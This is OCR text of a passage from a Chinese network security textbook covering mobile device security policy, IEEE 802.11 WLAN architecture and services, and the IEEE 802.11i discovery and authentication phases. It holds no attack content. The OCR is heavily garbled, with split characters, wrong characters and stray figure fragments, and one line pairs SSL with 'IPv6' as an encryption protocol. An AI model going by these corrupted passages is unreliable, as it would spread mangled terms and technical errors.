要 用 户 输入 4 位 PIN 码 或 口令 。 

e 文 持 口令 或 PIN 人 码 保护 。PIN 码 或 口令 不 仅 用 于 解锁 设备 ， 还 用 于 邮件 或 设备 上 其 他 
数据 传输 的 加 密 与 解密 。 
避免 使 用 用 户 名 和 密码 自动 填写 (auto-complete) 功能 。 
文 持 远 程 数 据 抹 除 功能 。 


尽 可 能 支持 SSL 安全 套 接 层 的 保护 。 
确保 操作 系统 和 应 用 软件 更 新 到 最 新 版 本 。 
尽 可 能 安装 反 病 毒 软件 。 
敏感 数据 禁止 存储 在 移动 设备 上 或 要 求 必 须 加 密 存储 。 
IT 部 门 员工 应 该 具有 远程 设备 访问 的 权限 ， 当 设备 丢失 或 被 盗 时 可 以 抹 除 设备 上 的 数 
据 或 令 设备 失效 。 
组 织 可 以 茶 用 所 有 第 三 方 应 用 程序 ， 或 是 使 用 白 名 单机 制 来 禁用 非 允 许 的 应 用 程序 ， 
或 是 实现 安全 沙 箱 来 将 公司 的 数据 和 程序 同 其 他 数据 和 程序 隔离 开 来 。 任 何在 允许 列 
表 里 的 应 用 程序 都 配置 有 认证 中 心 颁发 的 数字 签名 和 公 钥 证 书 。 
组 织 可 以 实现 和 强制 限定 设备 的 数据 同步 和 云 存 储 。 
e 为 了 防范 不 可 信 内 容 的 安全 威胁 ， 组 织 可 以 对 全 体 员 工 进 行 安全 意识 培训 ， 提 高 对 不 
可 信和 内容 可 能 导致 安全 威胁 的 认识 。 另 外 不 允许 使 用 移动 设备 上 的 摄像 头 。 
e 为 了 应 对 位 置 服务 信息 的 恶意 利用 ， 安 全 策略 可 以 要 求 所 有 设备 禁用 位 置 服务 功能 。 
流量 安全 ”流量 安全 基于 通常 的 加 密 和 认证 机 制 。 所 有 的 流量 以 加 密 的 方式 安全 传输 ， 比 
如 使 用 SSL 或 IPv6 协议 。 也 可 以 在 移动 设备 和 组 织 机 构 的 网 络 之 间 建 立 虚 拟 专 用 网 ( VPN) 
实现 安全 通信 。 
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利用 强大 的 认证 协议 来 限制 移动 设备 非 授 权 访 问 组 织 内 部 资源 。 移 动 设备 通常 具有 特定 的 
认证 用 户 ， 因 为 移动 设备 一 般 只 有 一 个 使 用 者 。 更 好 的 安全 策略 是 使 用 两 层 认证 机 制 ， 既 认证 
设备 又 认证 设备 的 使 用 者 。 

边界 安全 组织 需要 安全 机 制 来 保护 网 络 避免 遭受 未 授权 访问 ， 其 中 要 包括 针对 移动 设备 
流量 特定 的 防火 墙 机 制 。 防 火 墙 机 制 能 够 限定 所 有 移动 设备 对 数据 和 应 用 程序 的 访问 范围 。 类 
似 地 ， 入 侵 检 测 和 防御 系统 要 对 移动 设备 流量 具有 更 严格 的 控制 规则 。 


24.3 IEEE 802.11 无 线 局 域 网 概述 


IEEE 802 是 开发 一 系列 局 域 网 标准 的 委员 会 。1990 年 ，IEEE 802 委员 会 成 立 了 一 个 新 的 
工作 组 一 一 IEEE 802.11， 负 责 开 发 针对 无 线 局 域 网 (WLAN) 的 协议 和 传输 规范 。 从 那 时 起 ， 
工作 组 开始 探索 WLAN 对 于 不 同 频 率 和 数据 传输 速率 的 要 求 ， 随 之 发 布 了 一 系列 相关 标准 。 
表 24-1 简要 定义 了 IEEE 802.11 标准 中 的 关键 术语 。 


R 24-1 IEEE 802.11 术语 


接 人 点 (AP) 任何 具有 工作 站 功能 且 能 够 通过 无 线 介 质 为 分 发 系统 提供 接 人 的 实体 

基本 服务 集 (BSS) 单一 协调 功能 所 控制 的 工作 站 集合 

协调 功能 工作 站 所 具备 的 逻辑 功能 ， 在 一 个 基本 服务 集 内 发 送 和 接收 协议 数据 单元 

分 发 系统 (DS) 若干 个 基本 服务 集 互 联 组 成 的 局 域 网 所 构成 的 系统 

扩展 服务 集 (ESS) A 被 上 层 LCC 层 看 作 一 个 单独 的 


MAC 协议 数据 单元 (MPDU) 两 个 相 邻 的 MAC 实体 之 间 的 数据 交换 单元 
MAC 服务 数据 单元 (MSDU ) 在 MAC 用 户 之 间 传 输 的 信息 单元 
工作 站 包含 了 符合 IEEE 802.11 标准 的 MAC 和 物理 层 的 设备 


24.3.1 Wi-Fi 联盟 


第 一 个 获得 工业 界 广泛 认可 的 802.11 标准 是 802.11b 协议 。 尽 管 802.11b 协议 的 产品 都 基 
于 同样 的 标准 ， 但 不 同 厂商 生产 的 产品 能 和 否 互相 兼容 仍然 是 一 个 需要 考虑 的 问题 。 为 了 解决 
这 一 问题 ，1999 年 ， 无 线 以 太 网 兼容 性 联盟 ( WECA) 作为 一 个 工业 联盟 出 现 了 。 这 个 组 织 
后 重新 命名 为 Wi-Fi ( Wireless Fidelity) 联盟 ,创立 了 测试 套件 来 验证 不 同 802.11b 产品 之 间 的 
兼容 性 。 有 具有 许可 证 的 802.11b 产品 被 称 为 Wi-Fi。Wi-Fi 认证 随后 被 扩展 到 了 802.11g 产品 。 
Wi-Fi 联盟 随后 开发 了 802.11a 产 品 的 认证 过 程 ， 称 作 Wi-Fi5。 一 系列 的 无 线 局 域 网 市 场 领域 
都 与 Wi-Fi 联盟 相关 ， 包 括 组 织 、 家 庭 和 热点 。 

近期 ，Wi-Fi 联 盟 开 发 了 IEEE 802.11 安全 标准 的 认证 过 程 ， 被 称 作 Wi-Fi 保 护 访 问 
(WPA)。 最 新 版 本 的 WPA 是 WPA2, HOR T IEEE 802.11i 安全 规范 中 的 所 有 特性 。 


24.3.2 IEEE 802 协议 架构 


首先 我 们 简要 介绍 IEEE 802 协议 架构 ，IEEE 802.11 标准 定义 在 协议 层 结构 中 。 所 有 的 
IEEE 802 标准 均 使 用 这 一 结构 ， 如 图 24-3 所 示 。 

物理 层 IEEE 802 参考 模型 的 最 底层 是 物理 层 ， 其 中 包括 信和 号 的 编码 /解码 、 比 特 传输 / 
接收 等 功能 。 另 外 ， 物 理 层 包含 了 传输 介质 的 规范 。 比 如 , 在 IEEE 802.11 中 ， 物 理 层 就 定义 
了 频 市 和 天 线 特 性 。 
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介质 访问 控制 层 所 有 的 局 域 网 (LAN) 都 包含 了 共享 整个 网 络 传输 能 力 的 设备 集合 。 为 
了 控制 设备 对 传输 介质 的 访问 ， 需 要 提 [EEE 802 的 一 般 功能 ”IEEE 802.11 的 特有 功能 
供 高 效 有 序 的 访问 能 力 ， 这 是 介质 访问 FE se 
控制 层 (MAC) 的 作用 。MAC 层 接收 A 
来 自 上 一 层 协议 的 数据 ， 通 常 是 逻辑 链 六 三 sie 
路 控制 (LLC) 层 ， 将 其 封装 为 MAC | 
服务 数据 单元 (MSDU)。 介 质 访问 控制 
层 (MAC) 一 般 具 有 如 下 功能 : 


帧 的 封装 
起 寻 址 可 靠 数据 传 给 
| 介质 访问 控制 层 | 。 错误 检测 无 线 访问 控制 协议 
。 传输 时 将 数据 封装 成 帧 。 一 帧 转 介质 访问 


数据 被 称 为 MAC 协议 数据 单元 A 

Sl 信号 编码 /解码 频带 定义 
(MPDU)， 其 中 包含 地 址 和 错误 | waz 比特 发 送 /接收 pay 
检测 字段 。 ; 传输 介质 


e 接收 时 将 帧 解 开 ， 进 行 地 址 识 上 
别 和 错误 检测 。 图 24-3 IEEE 802.11 协议 栈 

e 控制 局 域 网 传输 介质 的 访问 。 

MPDU 单元 的 具体 格式 尽管 根据 不 同 的 MAC 协议 而 不 尽 相 同 ， 但 在 使 用 中 ， 一 般 所 有 的 
MPDU 单元 都 具有 类 似 的 格式 ， 如 图 24-4 所 示 。 下 面 是 一 帧 中 包含 的 字段 : 

e MAC 控制 字段 : 这 个 字段 包括 MAC 协议 功能 所 需 的 协议 控制 信息 ， 如 优先 级 别 。 
目的 MAC 地 址 : 该 MPDU 在 局 域 网 中 的 目的 物理 地 址 。 
源 MAC 地 址 : 该 MPDU 在 局 域 网 中 的 源 物理 地 址 。 
MAC 服务 数据 单元 : 来 目 更 高 一 层 的 数据 。 
CRC : 循环 元 余 校 验 字 段 ， 也 称 作 帧 检查 序列 字段 (FCS)。 这 是 一 种 错误 检查 码 ， 它 
也 被 用 在 其 他 数据 链 路 〈 data-link) 控制 协议 中 。CRC 是 基于 整个 MPDU 的 所 有 比特 
进行 计算 的 。 发 送 方 计算 CRC 的 值 并 将 其 加 入 帧 中 。 接 收 方 以 同样 的 方式 计算 CRC, 并 
与 帧 中 的 CRC 字段 进行 比较 ， 如 果 不 一 致 ， 则 说 明 传输 过 程 中 数据 发 生 一 位 或 多 位 错误 。 








MAC 头 部 MAC 尾 部 
图 24-4 IEEE 802 MPDU 的 一 般 格 式 


位 于 MAC 服务 数据 单元 (MSDU) 头 部 的 字段 被 称 为 MAC K, WEF MAC 服务 数据 单 
元 ( MSDU) 尾部 的 单元 则 被 称 为 MAC 尾部 。 头 部 和 尾部 的 控制 信息 和 中 间 的 数据 字段 一 
服务 于 MAC 协议 。 

逻辑 链 路 控制 层 ” 在 大 多 数 数据 链 路 (data-link) 协议 中 ， 数 据 链 路 协议 实体 不 仅 负责 利 
用 CRC 检测 错误 ， 还 要 重 传 受 损 的 数据 帧 来 修复 所 发 现 的 错误 。 在 局 域 网 络 协议 架构 中 ， 这 
两 个 功能 分 别 位 于 介质 访问 控制 层 (MAC) 和 逻辑 链 路 控制 层 (LLC)。MAC 层 负责 检 测 错误 ， 
丢弃 含有 错误 的 帧 。LLC 层 负责 记 录 成 功 接收 的 帧 ， 重 传 传输 错误 的 帧 。 


24.3.3 IEEE 802.11 网 络 组 件 和 架构 模型 


图 24-5 展示 了 802.11 工作 组 开发 的 模型 。 一 个 无 线 局 域 网 的 最 小 标准 部 件 叫 作 基本 服务 
集 ( Basic Service Set，BSS)， 它 由 执行 相同 MAC 协议 、 竞 争 访问 同一 共享 无 线 介 质 的 若干 个 
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无 线 工 作 站 组 成 。 一 个 基本 服务 集 (BSS) 可 以 是 孤立 的 ， 也 可 以 经 由 接 入 点 (AP) 连接 到 主 
干 分 发 系统 ( DS)。 接 入 点 起 到 网 桥 和 转播 站 的 作用 。 在 一 个 基本 服务 集 内 部 ， 客 户 工作 站 互 
相 不 直接 通信 ， 如 果 一 个 工作 站 希望 和 基本 服务 集 内 的 男 一 个 工作 站 通信 ， 源 工作 站 先 要 将 
MAC 帧 发 送 到 接 人 点 ， 接 人 点 再 将 该 帧 转送 给 目的 工作 站 。 类 似 地 ， 如 果 把 一 个 帧 从 一 个 基 
本 服务 集 的 工作 站 发 送 到 男 一 个 基本 服务 集 的 工作 站 ， 帧 先 从 源 工作 站 被 传 至 本 地 接 入 点 ,经 
由 分 发 系统 转发 到 目的 基本 服务 集 的 接 人 点 ， 再 发 送 到 目的 工作 站 。 基 本 服务 集 一 般 相 当 于 一 
个 细胞 单元 ， 分 发 系统 可 以 是 交换 机 、 有 线 网 络 或 者 无 线 网 络 。 

如 果 基 本 服务 集中 的 所 有 工作 站 是 移动 工作 站 ， 互 相 之 间 可 以 直接 通信 (没有 使 用 AP)， 
那么 这 样 的 基本 服务 集 叫 作 独 立 基本 服务 集 (IBSS)。 典 型 的 IBSS 是 ad-hoc 网 络 。 在 IBSS 
中 ， 所 有 的 工作 站 能 够 不 经 过 接 入 点 而 直 
接 通 信 。 

图 24-5 是 一 个 IEEE 802.11 网 络 架 
构 的 一 种 简单 配置 。 每 个 工作 站 仅 属 于 一 
个 基本 服务 集 ( BSS)， 每 个 工作 站 的 覆盖 
范围 限于 同一 个 基本 服务 集中 的 其 他 工作 SZ Ni: 
Wi. DIAM SEE EEX ARON 
mM, ATERKIA / 
加 入 两 个 基本 服务 集中 。 此 外 ， 工 作 站 和 
基本 服务 集 之 间 的 关联 是 动态 的 ， 工 作 站 
可 以 关闭 ， 可 以 随 着 位 置 的 移动 而 加 入 不 
同 的 基本 服务 集 。 

扩展 服务 集 (ESS) 由 分 发 系统 互联 
的 两 个 或 多 个 基本 服务 集 组 会 而 成 。 对 于 图 24-5 IEEE 802.11 扩展 服务 集 
逻辑 链 路 控制 层 来 说 ， 扩 展 服务 集 相当 于 一 个 单一 的 逻辑 局 域 网 。 


24.3.4 IEEE 802.11 服务 


IEEE 802.11 定义 了 无 线 LAN 提供 的 9 种 服务 ， 实 现 了 和 有 线 局 域 网 相同 的 功能 。 表 24-2 
列举 了 这 些 服务 并 给 出 了 两 种 分 类 方式 。 


R 24-2 IEEE 802.11 服务 
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基本 服务 集 N 
( BSS) 
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撤销 关联 MSDU 传递 
MSDU 传递 工作 站 MSDU 传递 
加 窗 局 域 网 访问 和 安全 


1. 服务 提供 者 可 以 是 工作 站 也 可 以 是 分 发 系统 (DS)。 每 一 个 802.11 设施 都 具备 工作 站 服 
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务 功 能 ， 包 括 接 人 点 (AP) 工作 站 。 分 发 服务 位 于 基本 服务 集 之 间 ， 由 接 和 人 点 提供 或 者 由 连接 
到 分 发 系统 的 特定 目的 设备 提供 。 
2. 3 个 服务 用 于 控制 IEEE 802.11 局 域 网 访问 和 保密 。6 个 服务 用 于 支持 工作 站 之 间 
MSDU 的 分 发 。 如 果 一 个 MSDU 过 大 ， 则 可 能 被 切 分 成 多 个 小 份 后 在 一 系列 MPDU 中 传输 。 
为 了 搞 清 楚 IEEE 802.11 扩展 服务 集 网 络 (ESS) 的 工作 原理 ， 我 们 接 下 来 将 根据 IEEE 
802.11 官方 文档 具体 讨论 IEEE 802.11 的 服务 。 上 文 已 经 提 到 MSDU 分 发 这 一 基本 服务 ， 有 关 
安全 的 服务 将 在 24.4 节 中 介绍 。 
分 发 系统 (DS) 中 的 消息 分 发 ”在 分 发 系统 中 有 两 个 服务 同 消息 分 发 有 关 ， 分别 是 分 发 服 
务 和 集成 服务 。 分 发 服务 是 工作 站 之 间 交 换 MPDU 的 主要 服务 ， 用 于 将 MPDU 从 一 个 基本 服 
务 集 的 工作 站 传输 到 另 一 个 基本 服务 集 的 工作 站 。 例 如 ， 在 图 24-5 中 ,假设 一 个 帧 从 工作 站 2 
(STA2 ) 传输 到 工作 站 7 (STA7 )， 那 么 首先 帧 被 发 送 到 该 基本 服务 集中 的 接 入 点 1 (AP1 )， 接 
入 点 1( AP1 ) 将 帧 交 给 分 发 系统 ， 由 分 发 系统 负责 将 其 传输 到 工作 站 7 (STAT ) 所 在 基本 服 
务 集 的 接 人 点 ， 随 后 接 和 人 点 2 (AP2 ) 接收 到 帧 并 转送 给 工作 站 7 (STA7 )。 而 分 发 系统 内 部 消 
息 的 传输 过 程 则 不 是 由 IEEE 802.11 标准 定义 的 。 
如 果 是 同一 个 基本 服务 集中 的 两 个 工作 站 进行 通信 ， 和 那么 分 发 服务 逻辑 上 只 是 经 过 该 基本 
服务 集中 的 单个 接 入 点 。 
集成 服务 负责 IEEE 802.11 局 域 网 工作 站 和 IEEE 802.x 局 域 网 工作 站 之 间 的 数据 通信 
“集成 ”这 一 术语 指 的 是 一 个 物理 上 与 分 发 系统 相连 的 有 线 局 域 网 ， 且 该 局 域 网 中 的 工作 站 可 
能 通过 集成 服务 与 某 个 IEEE 802.11 局 域 网 建立 逻辑 连接 。 集 成 服务 负责 数据 交换 过 程 所 需 的 
地 址 转换 和 介质 转换 逻辑 。 
关联 相关 的 服务 MAC 层 最 主要 的 目的 是 在 MAC 实体 之 间 传 输 MSDU， 这 是 由 分 发 系 
统 来 实现 的 。 为 此 ， 分 发 系统 则 需要 关联 相关 的 服务 为 其 提供 扩展 服务 集中 的 工作 站 信息 。 在 
分 发 服务 传输 和 接收 工作 站 数据 之 前 ， 工 作 站 必须 首先 与 之 关联 。 在 研究 关联 概念 之 前 ， 我 们 
首先 介绍 移动 性 的 概念 ， 基 于 移动 性 概念 ， 我 们 定义 出 三 种 标准 迁移 类 型 : 
e 不 迁移 型 : 这 种 类 型 的 工作 站 要 么 静止 不 动 ， 要 么 仅 在 同一 个 基本 服务 集 的 信号 覆盖 
范围 之 内 移动 。 
e BSS 迁移 型 : 这 种 类 型 定义 了 工作 站 在 同一 扩展 服务 集中 从 一 个 基本 服务 集 问 男 一 个 
基本 服务 集 的 移动 。 这 种 情况 下 工作 站 之 间 的 数据 传递 需要 寻 址 功能 ， 能 够 识别 工作 
站 移动 后 的 新 位 置 。 
e ESS 迁移 型 : 这 种 类 型 定义 了 工作 站 从 一 个 扩展 服务 集 移 动 到 另 一 个 扩展 服务 集 的 移动 。 
这 种 情况 仅 支 持 可 移动 的 工作 站 ， 无 法 保证 上 层 的 持续 连接 ， 服 务 有 可 能 发 生 中 断 。 
为 了 在 分 发 系统 中 传递 消息 ， 分 发 服务 需要 知道 每 个 工作 站 的 位 置 。 为 了 能 将 消息 传达 到 
对 应 的 目的 工作 站 ， 分 发 系统 需要 认证 每 一 个 接 人 和 人 点。 为 此 ， 工 作 站 必须 保证 与 所 在 基本 服务 
集 的 接 人 点 的 关联 ， 与 这 一 需求 有 关 的 服务 包括 以 下 三 个 : 
e 关联 : 在 工作 站 和 接 人 点 之 间 建 立 初始 化 关联 。 在 无 线 局 域 网 中 ， 一 个 工作 站 在 发 送 
或 者 接收 帧 之 前 ， 首 先 必须 与 所 在 基本 服务 集 的 接 人 点 建立 关联 ， 提 供 身 份 信息 和 地 址 
信息 。 接 人 点 会 与 一 扩展 服务 集 下 的 其 他 接 和 人 点 分 享 该 信息 ， 以 便于 帧 的 路 由 和 传递 。 
e BKK: 一 个 已 经 建立 的 关联 由 一 个 接 入 点 迁移 到 男 一 个 接 入 点 。 这 使 得 移动 工作 站 
可 以 在 不 同 的 基本 服务 集 之 间 移 动 。 
o 撤销 关联 : 来 自 工作 站 或 接 人 点 的 关联 终止 通知 。 工 作 站 应 该 在 离开 一 个 扩展 服务 集 
或 关机 之 前 发 出 撤销 关联 通知 。 然 而 ，MAC 管理 设施 会 避免 这 种 情况 (站 点 没有 通知 
而 消失 ) 发 生 以 保护 自身 。 
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24.4 IEEE 802.11i 无 线 局 域 网 安全 


除了 具备 有 线 局 域 网 的 特性 之 外 ， 无 线 局 域 网 还 具有 如 下 两 个 特性 : 

1. 为 了 通过 有 线 局 域 网 进行 传输 ， 工 作 站 必须 物理 连接 到 局 域 网 中 。 至 于 无 线 局 域 网 ， 任 
何 工 作 站 都 能 够 与 频段 范围 内 的 其 他 设备 进行 通信 。 从 某 种 程度 上 说 ， 工 作 站 需要 以 确定 的 且 
几乎 肯定 是 可 见 的 方式 接 入 有 线 局 域 网 这 一 事实 ， 本 和 映 就 可 以 说 是 一 种 形式 的 认证 机 制 了 。 

2. 同样 ， 为 了 接收 来 自 一 个 有 线 局 域 网 中 工作 站 的 数据 传输 ， 接 收工 作 站 必须 连接 到 有 线 
局 域 网 。 和 否则 ， 同 一 无 线 局 域 网 中 无 线 履 盖 范 围 内 任何 工作 站 都 能 接收 数据 。 因 此 ， 有 线 局 域 
网 提供 了 一 定 程 度 的 隐私 保护 ， 因 为 只 有 连接 到 局 域 网 的 工作 站 才能 接收 数据 。 

有 线 局 域 网 和 无 线 局 域 网 的 这 些 差异 使 得 无 线 局 域 网 需要 有 更 健壮 的 安全 服务 和 机 制 。 起 
初 的 802.11 规范 具有 一 系列 的 加 密 和 认证 特性 ， 但 都 相对 脆弱 。 在 机 密 性 方面 ，802.11 定义 
了 有 线 等 效 保密 (Wired Equivalent Privacy, WEP) 算法 ， 但 却 具 有 一 些 重大 的 漏洞 。 在 WEP 
之 后 ，802.11 标准 的 工作 组 针对 这 些 无 线 安全 问题 开发 了 很 多 新 功能 。 为 了 进一步 加 强 无 线 
局 域 网 的 安全 特性 ，Wi-Fi 联盟 发 布 了 无 线 网 络 保护 接 入 ( Wi-Fi Protected Access, WPA) 作 
为 Wi-Fi 标准 。WPA 在 802.11i 现 有 标准 上 实现 了 一 系列 安全 机 制 ， 消 除了 802.11 中 的 安全 隐 
患 。 最 终 形式 的 802.11i 标准 又 被 称 作 强健 的 安全 网 络 ( Robust Security Network，RSN)。 目 前 
Wi-Fi 联盟 遵循 基于 WPA2 的 802.11i 规范 来 认证 厂商 设备 。 


24.4.1 IEEE 802.11i 服务 


802.11i RSN 安全 规范 定义 了 如 下 服务 : 

e 认证 服务 : 认证 协议 定义 了 用 户 和 认证 服务 器 CAS) 之 间 的 数据 交换 方式 ， 以 提供 互 
相 认 证 机 制 ， 生 成 临时 密 钥 用 于 客户 端 和 接 入 点 的 无 线 连接 。 

e 访问 控制 服务 : 访问 控制 服务 强制 要 求 使 用 认证 功能 ， 提 供 消 息 路 由 ， 协 助 密 钥 交换 。 
这 一 服务 可 以 与 各 种 认证 协议 配合 工作 。 

e 消息 完整 性 加 密 服 务 : 将 MAC 层 数 据 和 消息 完整 性 编码 一 起 加 密 ， 确 保 数 据 没 有 被 
修改 过 。 

图 24-6a 展示 了 用 于 支持 以 上 服务 的 安全 协议 ， 图 24-6b 列举 了 所 用 的 密码 学 算法 。 


24.4.2 IEEE 802.11i 的 操作 阶段 


IEEE 802.11i RSN 的 操作 可 以 分 为 5 个 阶段 。 这 些 阶 段 的 具体 操作 与 网 络 配置 和 通信 双方 
终端 有 关 。 其 可 能 的 情况 包括 以 下 4 种 (参见 图 24-5 ): 

1. 两 个 无 线 工作 站 在 同一 个 基本 服务 集 内 经 由 接 入 点 进行 通信 。 

2, 两 个 无 线 工 作 站 在 同一 个 ad hoc 独立 基本 服务 集 内 直接 进行 通信 。 

3. 两 个 无 线 工作 站 在 不 同 的 基本 服务 集中 经 由 各 自 的 接 入 点 和 分 发 系统 进行 通信 。 

4. 一 个 无 线 工作 站 与 一 个 有 线 网 络 中 的 终端 经 由 接 人 点 和 分 发 系统 进行 通信 。 

IEEE 802.11i 协议 中 的 安全 仅 与 工作 站 和 对 应 接 人 点 的 安全 通信 有 关 。 在 情况 1 中 ,者 每 
个 工作 站 都 与 接 人 点 创建 安全 通信 ， 则 整个 通信 是 安全 的 。 情 况 2 与 情况 1 类 似 ， 工 作 站 中 包 
含 了 接 和 点 的 功能 。 在 情况 3 中 ，IEEE 802.11 标准 仅 提 供 基 本 服务 集 内 的 安全 通信 ， 不 负责 
分 发 系统 中 的 安全 通信 。 端 到 端的 安全 必须 由 上 层 提 供 。 类 似 地 ， 在 情况 4 中 ，IEEE 802.11i 
确保 工作 站 和 接 人 点 之 间 的 通信 安全 。 

出 于 这 些 考 虑 ， 图 24-7 描述 了 RSN 的 5 个 操作 阶段 ， 并 将 其 对 应 到 相应 的 网 络 组 件 下 。 
一 个 新 的 组 件 是 认证 服务 器 ( AS )， 长 方形 条 代表 MPDU 序列 的 一 次 数据 交换 。5 个 阶段 的 具 
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强健 的 安全 网 络 (RSN ) 


服务 





扩展 认证 协议 
> (CRAP) 


协议 


a) 服务 与 协议 
强健 的 安全 网 络 ( RSN ) 


服务 


完整 性 和 数据 源 认 证 密 钥 生 成 


算法 
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b ) 密码 学 算法 
CBC-MAC = 密码 分 组 链接 -消息 认证 码 
CCM = 计数 器 模式 密码 分 组 链接 -消息 认证 码 
CCMP = 计数 器 模式 密码 分 组 链接 -消息 认证 码 协议 
TKIP = 临时 密 钥 完整 性 协议 


图 24-6 IEEE 802.11i 标准 要 素 


源 工 作 站 接 入 点 认证 服务 器 目的 工作 站 





图 24-7 IEEE 802.11i 操作 流程 
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发 现 : 接 人 点 使 用 信 标 ( Beacon) 和 探测 响应 (Probe Response) 消息 来 通知 其 所 遵循 
的 IEEE 802.11i 安全 策略 ， 工 作 站 依据 这 一 消息 来 验证 即将 通信 的 接 人 上 点。 工作 站 与 
接 入 点 建立 关联 ， 并 根据 信 标 和 探测 响应 所 提供 的 信息 选择 加 密 套 件 和 认证 机 制 。 
e 认证 : 在 这 一 阶段 ， 工 作 站 和 认证 服务 器 相互 进行 身份 认证 。 认 证 事务 成 功 之 后 ， 接 
和 人 点 才 允 许 工 作 站 和 认证 服务 器 进行 其 他 数据 通信 。 接 和 人 点 不 参与 认证 过 程 ， 仅 负责 
工作 站 和 认证 服务 句 之 间 的 消息 转发 。 
e 密 钥 管理 : 接 和 人 点 和 工作 站 要 执行 若干 操作 来 完成 密 钥 的 生成 和 放置 。 此 阶段 中 帧 序 [716 
列 仅 在 接 入 点 和 工作 站 之 间 传 输 。 717 
o 保护 数据 传输 : 这 一 阶段 的 帧 序列 经 由 接 入 点 在 源 工 作 站 和 目的 工作 站 之 间 传 输 。 
图 24-7 中 的 条 形 深 灰色 阴影 和 加 密 模块 图 标 表 明 ， 安 全 数据 传输 仅 发 生 在 工作 站 和 接 
入 点 之 间 ， 并 不 保证 两 个 工作 站 之 间 的 安全 传输 。 
e 连接 终止 : 这 一 阶段 接 和 人 点 和 工作 站 交换 帧 序列 ， 撤 销 安全 连接 ， 连 接 恢 复原 始 状 态 。 


24.4.3 发 现 阶段 


我 们 首先 从 发 现 阶段 (如 图 24-8 顶部 所 示 ) 开始 , 来 了 解 更 多 有 关 RSN 操作 流程 的 具体 
内 容 。 这 一 阶段 的 目的 是 完成 工作 站 与 接 人 点 的 相互 识别 ， 在 安全 功能 上 达成 一 致 并 基于 这 些 
安全 功能 为 之 后 的 通信 创建 一 个 关联 。 
工作 站 接 入 点 认证 服务 器 


$ 





工作 站 选择 安全 选项 


探测 请 求 
工作 站 发 送 入 网 请 求 
探测 响应 接 入 点 发 送 可 能 的 
安全 选项 ( 每 个 安全 
开放 系统 策略 的 安全 功能 ) 
工作 站 发 送 认证 请 求 认证 请 求 
开放 系统 
认证 响应 加 
接 入 点 执行 认证 
工作 站 发 送 带 有 安全 关联 请 求 
关联 啊 应 接 入 点 发 送 关联 


802.1X 控 制 端口 阻塞 
802.1x EAP 请 求 


802.1x EAP 啊 应 


接 入 请 求 (EAP 请 求 ) 
RE 
扩展 认证 协议 (EAP ) 交换 


接受 /EAP 成 功 
密 钥 
802.1x EAP 成 功 


| | 
802.1X 控 制 端口 阻塞 


图 24-8 IEEE 802.11i 操作 流程 : 发现， 认证 ， 关 联 718 
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安全 功能 “在 发 现 阶段 ， 工 作 站 和 接 人 点 就 下 面 几 个 方面 的 具体 技术 做 出 协商 : 
© 用 以 保护 单 播 流 量 机 密 性 和 MPDU 完整 性 的 协议 (流量 仅 在 工作 站 和 接 入 点 之 间 )。 
e 认证 方法 。 
e 密码 学 密 钥 管理 方式 。 
保护 多 播 / 单 播 流量 的 机 密 性 和 完整 性 协议 由 接 人 点 支配 ， 同 在 一 个 多 播 组 内 的 所 有 工作 
站 必须 使 用 相同 的 协议 和 密码 。 协 议和 所 选 密 钥 长 度 (如 果 可 变 ) 一 起 被 称 作 密码 套件 。 机 密 
性 和 完整 性 密码 套件 的 选项 有 : 
© WEP， 密 钥 长 度 为 40 位 或 104 位 ， 并 允许 与 旧 的 IEEE 802.11 实现 向 后 兼容 。 
e TKIP. 
e CCMP. 
e 厂商 特定 (Vendor-specific) 的 方法 。 
另 一 个 协商 套件 是 认证 和 密 钥 管理 套件 ( AKM)， 其 定义 了 : (1) 接 人 点 和 工作 站 的 相互 
认证 方式 ; (2) 从 其 他 密 钥 中 提取 root 密 钥 的 方式 。 可 能 的 AKM 套件 有 : 
® IEEE 802.1X. 
e 预先 共享 的 密 铀 (没有 明确 的 认证 过 程 ， 相 互 的 认证 基于 STA 和 AP 间 共 享 的 唯一 的 
密 钥 )。 
se 厂商 特定 的 方法 。 
MPDU 交换 发 现 阶段 包含 三 个 数据 交换 过 程 。 
e 网 络 和 安全 功能 发 现 : 这 一 交换 过 程 中 ， 工 作 站 (STA) 发 现 网 络 的 存在 。 接 入 点 要 
么 通过 信和 标 帧 在 特定 信道 周期 地 广播 其 安全 功能 ， 其 中 安全 功能 由 RSNIE (Robust 
Security Network Information Elements) 显示 ; 要 么 通过 探测 啊 应 帧 啊 应 工作 站 的 请 求 。 
一 个 无 线 工 作 站 可 以 通过 被 动 监 听信 标 帧 或 是 主动 发 送 请 求 来 发 现 可 用 的 接 人 点 和 合 
适 的 安全 功能 。 
© 开放 系统 认证 : 这 一 帧 序列 交换 过 程 不 确保 安全 ， 只 是 保证 对 IEEE 802.11 硬件 实现 的 
719 状态 机 的 向 后 兼容 。 实 际 上 工作 站 和 接 入 点 交换 的 是 身份 标识 符 。 
e 关联 : 这 一 过 程 的 目的 是 在 安全 功能 上 达成 一 致 。 工 作 站 向 接 人 点 发 送 关联 请 求 帧 ， 
在 该 帧 中 ， 工 作 站 指定 了 由 接 人 点 提供 的 一 套 匹配 的 安全 功能 (一 个 认证 和 密 钥 管 理 
套件 、 一 对 密码 套件 、 一 个 组 密 钥 套件 )。 如 果 工 作 站 和 接 人 点 之 间 没 有 匹配 的 安全 功 
能 ， 接 人 点 将 拒绝 工作 站 的 关联 请 求 。 如 果 接 人 点 是 假冒 的 ， 或 者 有 攻击 者 在 信道 内 
插入 非法 帧 序列 ， 工 作 站 也 会 将 其 屏蔽 。 正 如 图 24-8 中 所 示 ，IEEE 802.1X 控制 端口 
被 阻塞 ， 没 有 用 户 流量 可 以 通过 。 阻 塞 端口 的 概念 将 在 下 文中 解释 。 


24.4.4 认证 阶段 


上 文中 提 到 ， 认 证 阶段 中 工作 站 (STA) 和 位 于 分 发 系统 (DS) 中 的 认证 服务 器 进行 相互 认 
证 。 实 现 认 证 的 目的 是 使 得 仅 有 已 认证 的 工作 站 才 被 允许 连接 到 网 络 ， 为 工作 站 提供 安全 保证 。 

IEEE 802.1X 访问 控制 方法 IEEE 802.11i 使 用 另 一 个 标准 来 提供 局 域 网 访问 控制 功能 ， 
这 就 是 IEEE 802.1X 一 一 基于 端口 的 网 络 访问 控制 ( Port-Based Network Access Control) 。 标 准 
定义 的 认证 协议 是 扩展 认证 协议 (Extensible Authentication Protocol, EAP), IEEE 802.1X 中 的 
术语 包括 请 求 者 、 认 证 者 、 认 证 服务 器 。 在 802.11 无 线 局 域 网 环境 中 ， 前 两 个 术语 对 应 无 线 
工作 站 和 接 人 点 。 认 证 服务 需 可 以 是 网 络 有 线 端 的 分 离 设备 ( 即 通过 DS 访问 )， 也 可 以 直接 位 
